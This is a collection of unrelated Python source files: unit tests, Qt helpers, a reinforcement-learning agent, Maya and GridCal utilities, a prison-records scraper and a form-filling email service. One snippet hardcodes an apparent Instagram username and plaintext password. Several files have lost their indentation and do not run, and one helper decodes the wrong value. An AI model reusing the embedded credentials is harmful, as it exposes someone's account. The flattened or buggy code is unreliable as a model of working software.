import unittest
from credentials import Credentials
class TestCredentials(unittest.TestCase):
    '''
    Test class that defines test cases for the Credentials class.
    Args:
        unittest.TestCase: aids in creating new test cases.
    '''
def setUp(self):
'''
runs before every test case
'''
self.new_credentials = Credentials("Instagram","Burence", "Br1")
def test_init(self):
'''
        tests proper object initialization
'''
self.assertEqual(self.new_credentials.app_name, "Instagram")
self.assertEqual(self.new_credentials.acc_username, "Burence")
self.assertEqual(self.new_credentials.acc_password, "Br1")
def tearDown(self):
        '''
        clears the credentials list after each test has run
        '''
Credentials.credentials_list = []
    def test_add_multiple_credentials(self):
'''
test case for add credentials logic
'''
self.new_credentials.add_credentials()
        test_credentials = Credentials("Twitter", "Moringa", "123r")
test_credentials.add_credentials()
self.assertEqual(len(Credentials.credentials_list),2)
def test_display_credentials(self):
'''
test case for displaying user's credentials
'''
self.assertEqual(Credentials.credentials_list,Credentials.display_credentials())
def test_credentials_exist(self):
'''
test case for confirming credentials that exist
'''
self.new_credentials.add_credentials()
test_credentials = Credentials("Instagram", "Burence","Br1")
test_credentials.add_credentials()
credential_exist = Credentials.credentials_exist("Instagram")
self.assertTrue(credential_exist)
    def test_search_app_name(self):
'''
test case for searching app by name
'''
self.new_credentials.add_credentials()
test_credentials = Credentials("Instagram", "Burence", "Br1")
test_credentials.add_credentials()
found_credentials = Credentials.search_app_name("Instagram")
self.assertEqual(found_credentials.app_name, test_credentials.app_name)
def test_delete_credentials(self):
'''
test case for delete credentials logic
'''
self.new_credentials.add_credentials()
test_credentials = Credentials("Instagram", "Burence", "Br1")
test_credentials.add_credentials()
test_credentials.delete_credentials()
self.assertEqual(len(Credentials.credentials_list), 1)
if __name__ == '__main__':
unittest.main()
|
## @file
## @brief @ref avr
## @copyright Dmitry Ponyatov <dponyatov@gmail.com> CC-NC-ND
## github: https://github.com/ponyatov/metapy430
from frame import *
## @defgroup avr AVR
## @brief @ref avr
## @ingroup mcu
## @{
class AVR(ARCH): pass
class ATmega(MCU): pass
## @}
|
# Copyright 2017 by Kurt Rathjen. All Rights Reserved.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
import functools
from studioqt import QtGui
from studioqt import QtCore
from studioqt import QtWidgets
def showWaitCursor(fn):
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):
        cursor = QtGui.QCursor(QtCore.Qt.WaitCursor)
        QtWidgets.QApplication.setOverrideCursor(cursor)
        try:
            return fn(*args, **kwargs)
        finally:
            QtWidgets.QApplication.restoreOverrideCursor()
    return wrapped
def showArrowCursor(fn):
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):
        cursor = QtGui.QCursor(QtCore.Qt.ArrowCursor)
        QtWidgets.QApplication.setOverrideCursor(cursor)
        try:
            return fn(*args, **kwargs)
        finally:
            QtWidgets.QApplication.restoreOverrideCursor()
    return wrapped
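# A minimal usage sketch (hypothetical function; requires a running
# QApplication): the wait cursor is shown for the duration of the call and
# restored even if the call raises.
#
#   @showWaitCursor
#   def loadItems(path):
#       return readItemsFromDisk(path)   # long-running work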
|
import tensorflow as tf
import numpy as np
from ml_utils.keras import get_states, set_states, apply_regularization
from ml_utils.model_builders import dense_stack
from .pget import create_traces, update_traces, step_weights_opt
from .pget import explore_continuous, explore_discrete, explore_multibinary
#TODO: saving/loading?
#TODO: args/kwargs for get_action/train, maybe accept "done" in train
#TODO: actually support alt_trace_method.... (see pget.update_traces...)
class Agent():
"""Note: requires TF eager"""
def __init__(self, model, optimizer=None, action_type="continuous", alt_trace_method=False,
epsilon=1e-7, advantage_clip=1, gamma=0.99, lambda_=0.9,
regularization=1e-6, noise=0.1, initial_deviation=1,
late_squash=True, use_squared_deviation=True):
self.model = model
#TODO: is this needed?
self.input_shape = tuple(self.model.input_shape[1:])
self.output_shape = tuple(self.model.output_shape[1:])
#hyperparameters
self.eps = epsilon
self.advantage_clip = advantage_clip
self.gamma = gamma
self.lambda_ = lambda_
self.alt_trace_method = alt_trace_method
self.regularization = regularization
self.noise = noise
self.last_advantage = 0
self.late_squash = late_squash
self.optimizer = (optimizer if optimizer is not None else
tf.keras.optimizers.Adam(1e-3, clipnorm=1.0))
self.use_squared_deviation = use_squared_deviation
#resolve exploration method/loss function
self.action_type = action_type.lower()
if self.action_type == "discrete":
self.loss = tf.keras.losses.categorical_crossentropy
explore_func = explore_discrete
elif self.action_type == "multibinary":
self.loss = tf.keras.losses.binary_crossentropy
explore_func = explore_multibinary
elif self.action_type == "continuous":
#TODO: try huber loss again?
self.loss = tf.losses.mean_squared_error
explore_func = explore_continuous
else:
raise ValueError("Unknown action type '{}'".format(action_type))
        # late_squash overrides the choice above: explore in pre-squash space
if self.late_squash:
explore_func = explore_continuous
self.loss = tf.losses.mean_squared_error
self.squash = (tf.nn.softmax if self.action_type == "discrete" else
tf.nn.sigmoid if self.action_type == "multibinary" else None)
self.explore = lambda x: explore_func(x, self.noise)
#initialization
self.traces = create_traces(self.model)
self.reward_mean = 0
self.reward_deviation = initial_deviation
def get_action(self, state):
#housekeeping
state = state.astype("float32")
#save pre-step hidden state
pre_step_state = get_states(self.model)
#calc action from state
#action = self.model.predict(np.expand_dims(state, 0))[0]
#https://github.com/keras-team/keras/issues/13118
#https://github.com/tensorflow/tensorflow/issues/33009
action = self.model.predict_on_batch(np.expand_dims(state, 0))[0]
#apply noise to action
action = self.explore(action)
#TODO: early bail?
#calc gradient for modified action & update traces based on gradient
update_traces(self.model, pre_step_state, self.traces,
np.expand_dims(state, 0), np.expand_dims(action, 0), self.loss, lambda_=self.lambda_)
#if discrete/multibinary, then squash
if self.late_squash and self.action_type != "continuous":
action = self.squash(action)
#explore with 0 noise just to get 0s/1s
action = (explore_discrete(action, 0) if self.action_type == "discrete" else
explore_multibinary(action, 0) if self.action_type == "multibinary" else action)
return action
def train(self, reward):
#scale/clip reward to calculate advantage
delta_reward = reward - self.reward_mean
advantage = delta_reward / (self.reward_deviation + self.eps)
if self.advantage_clip is not None:
advantage = np.clip(advantage, -self.advantage_clip, self.advantage_clip)
#update reward mean/deviation
self.reward_mean += delta_reward * (1 - self.gamma)
#TODO: experimental square instead of abs
if self.use_squared_deviation:
self.reward_deviation += (delta_reward ** 2 - self.reward_deviation) * (1 - self.gamma)
else:
self.reward_deviation += (np.abs(delta_reward) - self.reward_deviation) * (1 - self.gamma)
self.last_advantage = advantage
#step network in direction of trace gradient * advantage
apply_regularization(self.model, self.regularization)
        # use the agent's optimizer; the model itself may not be compiled
        step_weights_opt(self.model, self.traces, advantage, self.optimizer)
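# A minimal usage sketch of the get_action/train loop. The model construction
# and the environment are assumptions for illustration, not part of this module.
#
#   model = dense_stack(...)                        # any eager tf.keras model
#   agent = Agent(model, action_type="continuous")
#   state = env.reset()                             # hypothetical environment
#   while True:
#       action = agent.get_action(state)
#       state, reward, done, info = env.step(action)
#       agent.train(reward)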
|
import json
import maya.cmds as mc
def pyToAttr(objAttr, data):
"""
Write (pickle) Python data to the given Maya obj.attr. This data can
later be read back (unpickled) via attrToPy().
Arguments:
objAttr : string : a valid object.attribute name in the scene. If the
object exists, but the attribute doesn't, the attribute will be added.
The if the attribute already exists, it must be of type 'string', so
the Python data can be written to it.
data : some Python data : Data that will be pickled to the attribute
in question.
"""
obj, attr = objAttr.split('.')
# Add the attr if it doesn't exist:
if not mc.objExists(objAttr):
mc.addAttr(obj, longName=attr, dataType='string')
    # Make sure it is the correct type before modifying:
if mc.getAttr(objAttr, type=True) != 'string':
raise Exception("Object '%s' already has an attribute called '%s', but it isn't type 'string'"%(obj,attr))
    # Serialize the data to its corresponding JSON string value:
stringData = json.dumps(data)
# Make sure attr is unlocked before edit:
mc.setAttr(objAttr, edit=True, lock=False)
# Set attr to string value:
mc.setAttr(objAttr, stringData, type='string')
# And lock it for safety:
mc.setAttr(objAttr, edit=True, lock=True)
def attrToPy(objAttr):
"""
Take previously stored (pickled) data on a Maya attribute (put there via
pyToAttr() ) and read it back (unpickle) to valid Python values.
Arguments:
objAttr : string : A valid object.attribute name in the scene. And of course,
it must have already had valid Python data pickled to it.
Return : some Python data : The reconstituted, unpickled Python data.
"""
# Get the string representation of the pickled data. Maya attrs return
# unicode vals, and cPickle wants string, so we convert:
# objAttr = str(objAttr)
# Un-pickle the string data:
print objAttr
loadedData = json.loads(objAttr)
return loadedData
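# A minimal round-trip sketch (hypothetical node name; run inside a Maya session):
#
#   mc.createNode('transform', name='storageNode')
#   pyToAttr('storageNode.pyData', {'frames': [1, 2, 3], 'loop': True})
#   data = attrToPy('storageNode.pyData')   # -> {'frames': [1, 2, 3], 'loop': True}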
|
from instapy_cli import client
def upload_stories(image):
username = 'clippingcatolico'
password = 'neto1234'
with client(username, password) as cli:
cli.upload(image, story=True)
|
from pandas import Series
from pytest import approx
from signature_scoring.models import Profile
from helpers.mathtools import split_to_pos_and_neg
from helpers.cache import hash_series
from signature_scoring.models import Signature
from signature_scoring.scoring_functions.generic_scorers import score_spearman
import signature_scoring.scoring_functions.connectivity_score as connectivity
disease = Series({'BRCA1': 10, 'B': 1, 'T': -1, 'TP53': -10})
drug_1 = Series({'BRCA1': -10, 'T': -1, 'B': 1, 'TP53': +10})
drug_2 = Series({'BRCA1': -10, 'T': 1, 'B': -1, 'TP53': +10})
drug_3 = Series({'BRCA1': 2, 'TP53': -1, 'B': 1, 'T': -1})
def test_profile_ranks():
disease_profile = Profile(disease)
disease_ranks = {
gene: i + 1
for i, gene in enumerate(disease.sort_values().index)
}
#assert disease.rank().to_dict() == disease_ranks
#assert disease_ranks == {'BRCA1': 4, 'B': 3, 'T': 2, 'TP53': 1}
#assert disease_profile.top.ranks.to_dict() == disease_ranks
#assert disease_profile.full.ranks.to_dict() == disease_ranks
def test_zero_split():
pos, neg = split_to_pos_and_neg(disease.values)
assert list(pos) == [0, 1]
assert list(neg) == [2, 3]
pos, neg = split_to_pos_and_neg(Series({'A': 1, 'B': 0, 'C': 1}).values)
assert list(pos) == [0, 2]
assert list(neg) == []
def test_split():
down, up = Signature(disease).split(10)
assert list(down.index) == ['TP53', 'T']
assert list(up.index) == ['BRCA1', 'B']
down, up = Signature(Series(
dict(zip(
'ABCDEFGHI',
range(1, 10)
))
)).split(5)
assert list(down.index) == []
assert list(up.index) == ['I', 'H', 'G', 'F', 'E']
def test_hash():
# identical objects have same hash
assert hash_series(drug_1) == hash_series(drug_1)
# different values make different hashes
assert hash_series(drug_1) != hash_series(drug_2)
# different indexes make different hashes
drug_1_reindexed = drug_1.reindex(['B', 'BRCA1', 'TP53', 'T'])
assert hash_series(drug_1) != hash_series(drug_1_reindexed)
def test_profile_split():
drug_profile = Profile(drug_1)
drug_down, drug_up = Signature(drug_1).split(10)
assert (drug_down == drug_profile.top.down).all()
assert (drug_up == drug_profile.top.up).all()
def test_spearmanr():
disease_profile = Profile(disease)
drug_profile = Profile(drug_1)
assert score_spearman(disease_profile, drug_profile) == approx(2)
assert score_spearman(disease_profile, disease_profile) == approx(-2)
def test_cramer():
assert connectivity.cramér_von_mises(disease, drug_1) == 50
assert connectivity.cramér_von_mises(disease, disease) == 0
|
from unittest import TestCase
import numpy as np
import pandas as pd
from pyfibre.model.objects.fibre import Fibre
from pyfibre.model.tools.metrics import FIBRE_METRICS
from pyfibre.tests.probe_classes.objects import ProbeFibre
class TestFibre(TestCase):
def setUp(self):
self.fibre = ProbeFibre()
def test__getstate__(self):
status = self.fibre.to_json()
self.assertIn('growing', status)
new_fibre = Fibre.from_json(status)
status = new_fibre.to_json()
self.assertDictEqual(
status['graph'],
{'directed': False,
'graph': {},
'links': [{'r': 1.4142135623730951, 'source': 2, 'target': 3},
{'r': 1.4142135623730951, 'source': 3, 'target': 4},
{'r': 1, 'source': 4, 'target': 5}],
'multigraph': False,
'nodes': [{'xy': [0, 0], 'id': 2},
{'xy': [1, 1], 'id': 3},
{'xy': [2, 2], 'id': 4},
{'xy': [2, 3], 'id': 5}]
}
)
def test_node_list_init(self):
fibre = Fibre(nodes=[2, 3, 4, 5],
edges=[(3, 2), (3, 4), (4, 5)])
self.assertEqual(4, fibre.number_of_nodes)
self.assertEqual([2, 3, 4, 5], fibre.node_list)
self.assertTrue(fibre.growing)
self.assertTrue(np.allclose(np.array([0, 0]), fibre._d_coord))
self.assertTrue(np.allclose(np.array([0, 0]), fibre.direction))
self.assertEqual(90, fibre.angle)
self.assertEqual(0, fibre.euclid_l)
self.assertEqual(0, fibre.fibre_l)
self.assertTrue(np.isnan(fibre.waviness))
def test_network_init(self):
self.assertTrue(self.fibre.growing)
self.assertTrue(np.allclose(np.array([2, 3]), self.fibre._d_coord))
self.assertTrue(np.allclose(
np.array([-0.5547002, -0.83205029]), self.fibre.direction))
self.assertAlmostEqual(146.30993247, self.fibre.angle)
self.assertAlmostEqual(3.60555127, self.fibre.euclid_l)
self.assertAlmostEqual(3.82842712, self.fibre.fibre_l)
self.assertAlmostEqual(0.94178396, self.fibre.waviness)
def test_generate_database(self):
database = self.fibre.generate_database()
self.assertIsInstance(database, pd.Series)
self.assertEqual(3, len(database))
for metric in FIBRE_METRICS + ['Angle']:
self.assertIn(
f'Fibre {metric}', database)
|
"""
Schema validation tools
"""
import jsonschema
from . import versions
def validate(data, schema_type, version="dev"):
"""
Validates a given input for a schema input and output type.
"""
schema = versions.get_schema(schema_type, version)
jsonschema.validate(data, schema)
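# A minimal usage sketch ("input" as schema_type is an assumption; valid types
# depend on the schemas registered in `versions`). jsonschema.validate raises
# jsonschema.exceptions.ValidationError on failure and returns None on success.
#
#   validate({"molecule": {...}}, "input", version="dev")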
|
import os
import json
import jsonlines
import h5py
import networkx as nx
import math
import numpy as np
class ImageFeaturesDB(object):
def __init__(self, img_ft_file, image_feat_size):
self.image_feat_size = image_feat_size
self.img_ft_file = img_ft_file
self._feature_store = {}
def get_image_feature(self, scan, viewpoint):
key = '%s_%s' % (scan, viewpoint)
if key in self._feature_store:
ft = self._feature_store[key]
else:
with h5py.File(self.img_ft_file, 'r') as f:
ft = f[key][...][:, :self.image_feat_size].astype(np.float32)
self._feature_store[key] = ft
return ft
def get_obj_local_pos(raw_obj_pos):
x1, y1, w, h = raw_obj_pos[:, 0], raw_obj_pos[:, 1], raw_obj_pos[:, 2], raw_obj_pos[:, 3]
x2 = x1 + w
y2 = y1 + h
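    # normalize corners by the (assumed) 640x480 frame size; the last
    # column is the box area as a fraction of the frame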
obj_local_pos = np.stack([x1/640, y1/480, x2/640, y2/480, w*h/(640*480)], 0).transpose()
return obj_local_pos
def load_obj_database(obj_feat_file, image_feat_size):
obj_feats = {}
with h5py.File(obj_feat_file, 'r') as f:
for key in f:
obj_feats[key] = {
'obj_ids': [str(x) for x in f[key].attrs['obj_ids']],
'fts': f[key][...].astype(np.float32)[:, :image_feat_size],
'bboxes': f[key].attrs['bboxes'],
'viewindexs': f[key].attrs['viewindexs'],
}
return obj_feats
def load_instr_datasets(anno_dir, dataset, splits, tokenizer):
data = []
for split in splits:
if "/" not in split: # the official splits
if tokenizer == 'bert':
filepath = os.path.join(anno_dir, 'REVERIE_%s_enc.json' % split)
elif tokenizer == 'xlm':
filepath = os.path.join(anno_dir, 'REVERIE_%s_enc_xlmr.json' % split)
else:
                raise NotImplementedError('unsupported tokenizer %s' % tokenizer)
with open(filepath) as f:
new_data = json.load(f)
else: # augmented data
print('\nLoading augmented data %s for pretraining...' % os.path.basename(split))
with open(split) as f:
new_data = json.load(f)
# Join
data += new_data
return data
def construct_instrs(anno_dir, dataset, splits, tokenizer=None, max_instr_len=512):
data = []
for i, item in enumerate(load_instr_datasets(anno_dir, dataset, splits, tokenizer)):
# Split multiple instructions into separate entries
for j, instr in enumerate(item['instructions']):
new_item = dict(item)
if 'objId' in item:
new_item['instr_id'] = '%s_%s_%d' % (str(item['path_id']), str(item['objId']), j)
else:
new_item['path_id'] = item['id']
new_item['instr_id'] = '%s_%d' % (item['id'], j)
new_item['objId'] = None
new_item['instruction'] = instr
new_item['instr_encoding'] = item['instr_encodings'][j][:max_instr_len]
del new_item['instructions']
del new_item['instr_encodings']
# ''' BERT tokenizer '''
# instr_tokens = ['[CLS]'] + tokenizer.tokenize(instr)[:max_instr_len-2] + ['[SEP]']
# new_item['instr_encoding'] = tokenizer.convert_tokens_to_ids(instr_tokens)
data.append(new_item)
return data
|
"""Test classifier_cls_by_name."""
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import MultinomialNB
from skutil.estimators import classifier_cls_by_name
def test_base():
assert classifier_cls_by_name('LogisticRegression') == LogisticRegression
assert classifier_cls_by_name('logisticregression') == LogisticRegression
assert classifier_cls_by_name('logreg') == LogisticRegression
assert classifier_cls_by_name('SVC') == SVC
assert classifier_cls_by_name('svc') == SVC
assert classifier_cls_by_name('SVM') == SVC
assert classifier_cls_by_name('svm') == SVC
assert classifier_cls_by_name('MultinomialNB') == MultinomialNB
assert classifier_cls_by_name('multinomialnb') == MultinomialNB
assert classifier_cls_by_name('mnb') == MultinomialNB
|
import allure
from page_objects.LoginPage import LoginPage
@allure.parent_suite("Checking the opencart test shop")
@allure.suite("Authorization page tests")
@allure.epic("Checking the opencart shop")
@allure.feature("Checking the presence of elements on the login page")
@allure.title("Finding elements on the login page")
@allure.description("""The test checks the presence of elements on the login page""")
@allure.severity(allure.severity_level.CRITICAL)
def test_find_elements_login_page(browser):
login_page = LoginPage(browser).open()
login_page.find_input_email()
login_page.find_continue_button()
login_page.find_input_password()
login_page.find_forgotten_password()
login_page.find_login_button()
@allure.parent_suite("Checking the opencart test shop")
@allure.suite("Authorization page tests")
@allure.epic("Checking the opencart shop")
@allure.feature("Checking the ability to log in and out as a customer")
@allure.title("Logging in on the authorization page")
@allure.description("""The test checks the ability to log in and out as a customer on the authorization page""")
@allure.severity(allure.severity_level.CRITICAL)
def test_login_as_customer(browser):
    # pytest.skip('Reason for skipping the test')
login_page = LoginPage(browser).open()
login_page.login_as_customer('test@ya.ru', 'test')
login_page.logout_as_customer()
login_page.verify_title('Account Logout')
|
from twilio.twiml.voice_response import Redirect, VoiceResponse
response = VoiceResponse()
response.redirect('http://www.foo.com/nextInstructions')
print(response)
|
# -*- coding: utf-8 -*-
import time
import requests
import pandas as pd
from bs4 import BeautifulSoup
INDEX_DEATH_ROW_INFO_URL = 1
INDEX_LAST_STATEMENT_URL = 2
base_url = "https://www.tdcj.texas.gov/death_row/"
death_row_infos = []
headers = {
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Language':'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6',
'Cache-Control':'max-age=0',
'Connection':'keep-alive',
'Cookie': "__utmc=67821652; __utmz=67821652.1550809495.1.1.utmcsr=ruanyifeng.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/2019/02/weekly-issue-44.html; menu_generic_headers=-1c; __utma=67821652.1534429385.1550809495.1550811580.1550815385.3; __utmt=1; __utmb=67821652.5.10.1550815385",
'Host':'www.tdcj.texas.gov',
'Upgrade-Insecure-Requests':'1',
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
}
source_html = requests.get(base_url + "dr_executed_offenders.html",
headers=headers).text
soup = BeautifulSoup(source_html, 'html.parser')
soup_table = soup.find("table", attrs={"class": "tdcj_table indent"})
soup_trs = soup_table.find_all("tr")
# parse the attribute names from the header row
attribute_list = [soup_th.get_text().strip() for soup_th in soup_trs[0].find_all("th")]
# two of the header names are ambiguous, so rename them
attribute_list[INDEX_DEATH_ROW_INFO_URL] = "Offender Information URL"
attribute_list[INDEX_LAST_STATEMENT_URL] = "Last Statement URL"
attribute_list = [attribute.lower().replace(" ", "_") for attribute in attribute_list]
# parse detail of death rows
for soup_death_row in soup_trs[1: ]:
soup_tds = soup_death_row.find_all("td")
value_list = [soup_td.get_text().strip() for soup_td in soup_tds]
# get special attribute value
death_row_info_url = base_url + soup_tds[INDEX_DEATH_ROW_INFO_URL].find("a").get('href')
last_statement_url = base_url + soup_tds[INDEX_LAST_STATEMENT_URL].find("a").get('href')
value_list[INDEX_DEATH_ROW_INFO_URL] = death_row_info_url
value_list[INDEX_LAST_STATEMENT_URL] = last_statement_url
death_row_infos.append(dict(zip(attribute_list, value_list)))
# get last statement
for death_row_info in death_row_infos:
last_statement_url = death_row_info["last_statement_url"]
print("number:", death_row_info["execution"])
last_statement_html = requests.get(last_statement_url,
headers=headers).text
soup = BeautifulSoup(last_statement_html, 'html.parser')
split_results = soup.text.split('Last Statement:')
last_statement = split_results[1].strip() if len(split_results) > 1 else "No last statement"
    # trim trailing page boilerplate if present
    last_statement = last_statement.split('Employee Resource')[0].strip()
print(last_statement)
death_row_info.update({"last_statement": last_statement})
time.sleep(3)
pd_data = pd.DataFrame(death_row_infos)
pd_data.to_csv("Last-Statement-of-Death-Row.csv")
|
# encoding: utf-8
"""
open booking connect
Copyright (c) 2021, binary butterfly GmbH
Use of this source code is governed by an MIT-style license that can be found in the LICENSE file.
"""
from typing import Union
from .redis import Redis
class RedisWrapper:
def __init__(self, redis: Redis, database: str):
self.redis = redis
self.database = database
async def get(self, key: Union[str, int]) -> Union[str, None]:
result = await self.redis.get(self.database, str(key))
if result is None:
return None
return result
    async def set(self, key: Union[str, int], value: str):
return await self.redis.set(self.database, str(key), value)
async def remove(self, key: Union[str, int]):
return await self.redis.remove(self.database, str(key))
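# A minimal usage sketch (assumes an already-connected Redis instance):
#
#   async def demo(redis: Redis):
#       bookings = RedisWrapper(redis, database="bookings")
#       await bookings.set(42, "confirmed")    # keys are coerced to str
#       status = await bookings.get(42)        # -> "confirmed" or None
#       await bookings.remove(42)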
|
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from PySide2.QtWidgets import *
from PySide2 import QtCore
from GridCal.Engine.Simulations.result_types import ResultTypes
from GridCal.Engine.Simulations.results_table import ResultsTable
def fast_data_to_text(data, columns, index):
# header first
txt = '\t' + '\t'.join(columns) + '\n'
# data
for t, index_value in enumerate(index):
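        # rows whose numeric sum is zero are skipped; non-numeric rows raise
        # TypeError on sum() and are written out verbatim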
try:
if data[t, :].sum() != 0.0:
txt += str(index_value) + '\t' + '\t'.join([str(x) for x in data[t, :]]) + '\n'
except TypeError:
txt += str(index_value) + '\t' + '\t'.join([str(x) for x in data[t, :]]) + '\n'
return txt
def fast_data_to_numpy_text(data):
if len(data.shape) == 1:
txt = '[' + ', '.join(['{0:.6f}'.format(x) for x in data]) + ']'
elif len(data.shape) == 2:
if data.shape[1] > 1:
# header first
txt = '['
# data
for t in range(data.shape[0]):
txt += '[' + ', '.join(['{0:.6f}'.format(x) for x in data[t, :]]) + '],\n'
txt += ']'
else:
txt = '[' + ', '.join(['{0:.6f}'.format(x) for x in data[:, 0]]) + ']'
else:
txt = '[]'
return txt
class ResultsModel(QtCore.QAbstractTableModel):
"""
Class to populate a Qt table view with data from the results
"""
def __init__(self, table: ResultsTable, parent=None):
"""
        :param table: ResultsTable instance holding the results to display
"""
QtCore.QAbstractTableModel.__init__(self, parent)
self.table = table
self.units = table.units
def flags(self, index):
if self.table.editable and index.column() > self.table.editable_min_idx:
return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
else:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def rowCount(self, parent=None):
"""
:param parent:
:return:
"""
return self.table.r
def columnCount(self, parent=None):
"""
:param parent:
:return:
"""
return self.table.c
def data(self, index, role=QtCore.Qt.DisplayRole):
"""
:param index:
:param role:
:return:
"""
if index.isValid():
val = self.table.data_c[index.row(), index.column()]
if role == QtCore.Qt.DisplayRole:
if isinstance(val, str):
return val
elif isinstance(val, complex):
if val.real != 0 or val.imag != 0:
return val.__format__(self.table.format_string)
else:
return '0'
else:
if val != 0:
return val.__format__(self.table.format_string)
else:
return '0'
elif role == QtCore.Qt.BackgroundRole:
return None # QBrush(Qt.yellow)
return None
def headerData(self, section, orientation, role=None):
"""
Get the header value
:param section: header index
:param orientation: Orientation {QtCore.Qt.Horizontal, QtCore.Qt.Vertical}
:param role:
:return:
"""
if role == QtCore.Qt.DisplayRole:
if orientation == QtCore.Qt.Horizontal:
if len(self.table.cols_c) > section:
return self.table.cols_c[section]
elif orientation == QtCore.Qt.Vertical:
if self.table.index_c is None:
return section
else:
if self.table.isDate:
                        return self.table.index_c[section].strftime('%Y/%m/%d %H:%M:%S')
else:
return str(self.table.index_c[section])
return None
def slice_cols(self, col_idx) -> "ResultsModel":
"""
Make column slicing
:param col_idx: indices of the columns
        :return: ResultsModel with only the selected columns
"""
return ResultsModel(self.table.slice_cols(col_idx))
def search_in_columns(self, txt):
"""
Search stuff
:param txt:
:return:
"""
print('Searching', txt)
mdl = self.table.search_in_columns(txt)
if mdl is not None:
print('Found')
return ResultsModel(mdl)
else:
return None
def copy_to_column(self, row, col):
"""
        Copies one value to the whole column
@param row: Row of the value
@param col: Column of the value
@return: Nothing
"""
self.table.copy_to_column(row, col)
def is_complex(self):
return self.table.is_complex()
def get_data(self):
"""
Returns: index, columns, data
"""
return self.table.get_data()
def convert_to_cdf(self):
"""
Convert the data in-place to CDF based
:return:
"""
# calculate the proportional values of samples
self.table.convert_to_cdf()
def convert_to_abs(self):
"""
Convert the data to abs
:return:
"""
self.table.convert_to_abs()
def to_df(self):
"""
get DataFrame
"""
return self.table.to_df()
def save_to_excel(self, file_name):
"""
save data to excel
:param file_name:
"""
self.to_df().to_excel(file_name)
def save_to_csv(self, file_name):
"""
Save data to csv
:param file_name:
"""
self.to_df().to_csv(file_name)
def get_data_frame(self):
"""
        Get the data as a pandas DataFrame
"""
return self.table.get_data_frame()
def copy_to_clipboard(self):
"""
        Copy the table to the clipboard as tab-separated text
"""
n = len(self.table.cols_c)
if n > 0:
index, columns, data = self.get_data()
txt = fast_data_to_text(data, columns, index)
# copy to clipboard
cb = QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
cb.setText(txt, mode=cb.Clipboard)
else:
# there are no elements
pass
def copy_numpy_to_clipboard(self):
"""
        Copy the data to the clipboard as a numpy array literal
"""
n = len(self.table.cols_c)
if n > 0:
index, columns, data = self.get_data()
txt = fast_data_to_numpy_text(data)
# copy to clipboard
cb = QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
cb.setText(txt, mode=cb.Clipboard)
else:
# there are no elements
pass
def plot(self, ax=None, selected_col_idx=None, selected_rows=None):
"""
Plot the data model
:param ax: Matplotlib axis
:param selected_col_idx: list of selected column indices
:param selected_rows: list of rows to plot
"""
self.table.plot(ax=ax, selected_col_idx=selected_col_idx, selected_rows=selected_rows)
|
# -*- coding: utf-8 -*-
"""
.. module: byroapi.byroapi
:synopsis: Main module
.. moduleauthor:: "Josef Nevrly <josef.nevrly@gmail.com>"
"""
import asyncio
import io
import logging
from typing import BinaryIO, Union
from aioyagmail import AIOSMTP
from .http_handler import HttpHandler
from .template import Template, draw_on_template, register_fonts
from .base import ByroapiException
logger = logging.getLogger("byroapi")
class ByroApiError(ByroapiException):
pass
class ByroApi:
def __init__(self, config, loop=None):
self._config = config
self._loop = loop or asyncio.get_event_loop()
# REST
self._http_handler = HttpHandler(
self._loop,
form_request_clbk=self._process_form,
template_update_clbk=self._update_template
)
self._http_task = None
# Templates
register_fonts(self._config["templating"]["fonts"])
self._templates = {}
for template in self._config["templating"]["templates"]:
self._templates[template["id"]] = Template(
template, self._config["templating"]
)
def _fill_form(self, form_payload: dict) -> BinaryIO:
form_output = io.BytesIO()
try:
template = self._templates[form_payload["template"]]
except KeyError:
err_msg = f"Unknown template: {form_payload['template']}"
logger.error(err_msg)
form_output.close()
raise ByroApiError(err_msg)
draw_on_template(template.get_template_path(
form_payload["form_data"]),
form_output,
template.get_draw_function(form_payload["form_data"])
)
return form_output
    def fill_form_to_file(self, form_payload: dict,
                          output_file: BinaryIO) -> None:
        with self._fill_form(form_payload) as filled_form:
            output_file.write(filled_form.getbuffer())
async def _process_form(self, form_payload: dict) -> Union[BinaryIO, None]:
filled_form = self._fill_form(form_payload)
appendix_msg = ""
if form_payload["result"]["email"]["to"] is not None:
# Configure sender (default from SMTP config, or dynamic
# from the API request
smtp_settings = self._config["email"]["smtp"].cascade()
if form_payload["result"]["email"]["from"] is not None:
if "user" in smtp_settings:
logger.warning("Email 'from' field defined although user "
"set in SMTP configuration -> skipping.")
else:
smtp_settings["user"] = form_payload["result"][
"email"]["from"]
else:
if "user" not in smtp_settings:
logger.warning(
"User not configured in SMTP setting and no "
"'from' field defined in the request -> Sender will "
"be unknown.")
smtp_settings = dict(smtp_settings.copy_flat())
# Sending the result by mail
async with AIOSMTP(**smtp_settings) as yag:
# Prepare the buffer
filled_form.seek(0)
# Attachment file name
filled_form.name = form_payload["result"]["email"][
"attachments"] or f"{form_payload['template']}.pdf"
